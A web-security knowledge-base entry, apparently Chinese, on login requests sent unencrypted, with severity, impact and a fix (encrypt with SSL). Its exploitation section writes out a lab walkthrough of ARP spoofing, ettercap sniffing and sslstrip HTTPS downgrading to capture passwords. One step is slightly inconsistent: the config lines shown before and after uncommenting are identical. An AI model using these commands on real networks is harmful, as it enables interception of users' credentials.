1.11 未加密登陆请求漏洞

漏洞描述

网站对用户登录认证信息未进行加密，敏感信息以明文形式进行传送，易在传输过程中被获取。

漏洞等级

中危

漏洞危害

易造成用户敏感信息泄露与篡改。

漏洞利用

实验环境

kali：192.168.0.105 受害机：192.168.0.106

实战抓取http密码

开启流量转发

echo 1 > /proc/sys/net/ipv4/ip_forward

进行arp欺骗

开启监听

ettercap -Tq -i eth0

目标机登录账户密码

kali返回账户密码

实战抓取https密码

1、root@kali:~# arpspoof -i eth0 -t 10.10.10.129 10.10.10.2

2、更改Sslstrip 配置文件

vim /etc/ettercap/etter.conf

if you use iptables:

redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

将这两行的注释去掉如下：

if you use iptables:

redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

3、root@kali:~# sslstrip -a -f -k

4、root@kali:~# ettercap -Tq -i eth0

漏洞修复

建议通过加密连接（如SSL）方式进行敏感信息的传送。

Previous1.10 敏感信息泄露漏洞 Next1.12 后台弱口令漏洞

Last updated 6 years ago

Was this helpful?

hashtag1.11 未加密登陆请求漏洞

hashtag漏洞描述

hashtag漏洞等级

hashtag漏洞危害

hashtag漏洞利用

hashtag实战抓取http密码

hashtag实战抓取https密码

hashtagif you use iptables:

hashtagredir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

hashtagredir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

hashtagif you use iptables:

hashtag漏洞修复